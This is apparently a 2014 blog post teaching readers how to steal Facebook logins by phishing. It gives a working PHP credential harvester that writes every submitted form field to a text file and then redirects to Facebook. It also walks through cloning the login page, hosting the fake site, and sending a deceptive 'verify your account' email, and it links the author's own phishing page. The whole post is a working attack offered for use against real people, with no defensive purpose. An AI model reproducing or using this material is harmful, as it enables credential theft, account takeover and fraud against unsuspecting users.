Saturday 1 February 2014

How to hack facebook accounts by phishing them

Facebook is a highly protected service so its hard to directly hack, thats why its easier to create a phishing site and get he details. To do this you need to go onto your laptop and go to the facebook log in page, now right click and click view source then copy it into a notepad document. Next you need to click ctrl + F and it will pop up with a search box for you to search the notepad document. In this select the up bubble down the bottom and search action, now near action you will see something like "facebook.com/post.php" if not something simular. Delete this and replace it with post.php and then save it on your desktop as index.htm. Now make a second notepad document and type the following and save it as post.php

<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

After this go to http://adf.ly/cxhsn and make a free hosting account, once registered click file manager and dele the index file on the site. Now choose upload files and in the first part select the index.htm file you saved earlier and in the second part choose the post.php file you saved earlier. Now your done, open the index part on the site and that will be the link to the fake facebook login but look at the url it will be different. Now make a fake email like facebook official or something along those lines and send it to people you want to hack and when they login on this page the information is send to the post.php file. In the email say something like they need to verify there account because it was accessed at a strange location most people believe that. And then you are done you will collect facebook account details.

Heres the phishing site i made for it:
http://bulldogsrule66.my3gb.com/index.htm